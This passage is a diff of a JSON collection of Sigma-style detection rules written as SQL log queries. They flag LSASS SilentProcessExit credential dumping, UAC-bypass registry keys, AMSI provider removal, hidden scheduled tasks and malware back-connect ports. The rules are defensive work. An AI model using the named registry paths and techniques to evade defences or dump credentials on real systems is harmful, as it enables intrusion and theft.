"37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.persistence", "attack.t1547.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 